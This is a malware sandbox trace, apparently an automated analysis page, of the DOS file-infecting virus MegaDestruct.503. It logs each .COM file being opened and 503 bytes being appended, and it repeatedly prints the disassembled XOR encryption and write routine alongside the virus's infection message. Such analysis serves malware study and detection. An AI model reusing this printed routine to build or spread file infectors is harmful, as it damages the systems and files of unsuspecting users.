Sample viewer

vx.netlux.org/Virus.DOS.VCC.MegaDestruct.503

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:44.6225625Z 26 PC: 12a72 | Set disk transfer address
2018-12-17T22:57:44.623630647Z 37 PC: 12a80 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:44.625244862Z 37 PC: 12a84 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:44.626336784Z 78 PC: 12acf | Find first file
2018-12-17T22:57:44.632939016Z 61 PC: 12bcb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:44.641190407Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:44.648319237Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:44.650136834Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:44.652747412Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:44.65581076Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:44.657365132Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:44.661235478Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.044877013Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.068886567Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.072426732Z 61 PC: 12bcb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:45.081260508Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.093037296Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.094840365Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.097668071Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.100601134Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.102139306Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x43
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.106782605Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.116112824Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.125281439Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.129347753Z 61 PC: 12bcb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:45.138370113Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.146041373Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.14805003Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.150507018Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.153905787Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.155855672Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x49
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.160794707Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.170394332Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.179770659Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.183980953Z 61 PC: 12bcb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:45.191677852Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.19938004Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.201994875Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.203626633Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.207049247Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.209102928Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x4e
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.211680843Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.221022805Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.231100639Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.23485696Z 61 PC: 12bcb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:45.242733587Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.250113009Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.252976832Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.254909275Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.25824221Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.261146941Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x53
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.26402452Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.274611031Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.284866319Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.288224231Z 61 PC: 12bcb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:45.296156762Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.304585807Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.306898454Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.308897262Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.312559857Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.31510402Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x53
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.317967723Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.327394894Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.337152306Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.341153708Z 61 PC: 12bcb | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:45.348497002Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.358293728Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.360068925Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.36164611Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.365754413Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.367995225Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x59
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.371000264Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.381191602Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.393172984Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.396363863Z 59 PC: 12ae0 | Change current directory
2018-12-17T22:57:45.402167132Z 26 PC: 12ae9 | Set disk transfer address
2018-12-17T22:57:45.40374615Z 9 PC: 12afb | Display string (String= 'You computher is now infected with: MEGA-DESTRUCTION The Conjurers.... ')
2018-12-17T22:57:45.413239666Z 63 PC: 12bda | Read file or device (Read 47866 bytes on handle 7950)
2018-12-17T22:57:45.41542291Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.418219908Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.420102136Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 7950)
2018-12-17T22:57:45.42216274Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.424627443Z 44 PC: 12c14 | Get time 0x12c14: mov byte ptr [bp + 0x1f7], dl
0x12c18: call 0x12c2e
0x12c1b: mov ah, 0x40
0x12c1d: mov cx, 0x1f7
0x12c20: lea dx, word ptr [bp + 6]
0x12c24: int 0x21
0x12c26: call 0x12c2e
0x12c29: mov ah, 0x3e
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]
0x12c32: mov cx, 0x1b9
0x12c35: xor byte ptr [si], 0x5e
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35
0x12c3c: ret
0x12c3d: add word ptr [bx], di
0x12c3f: aas
0x12c40: aas
2018-12-17T22:57:45.427347376Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 7950)
2018-12-17T22:57:45.429262466Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.432964115Z 2 PC: 1411d | Character output (Char = '06')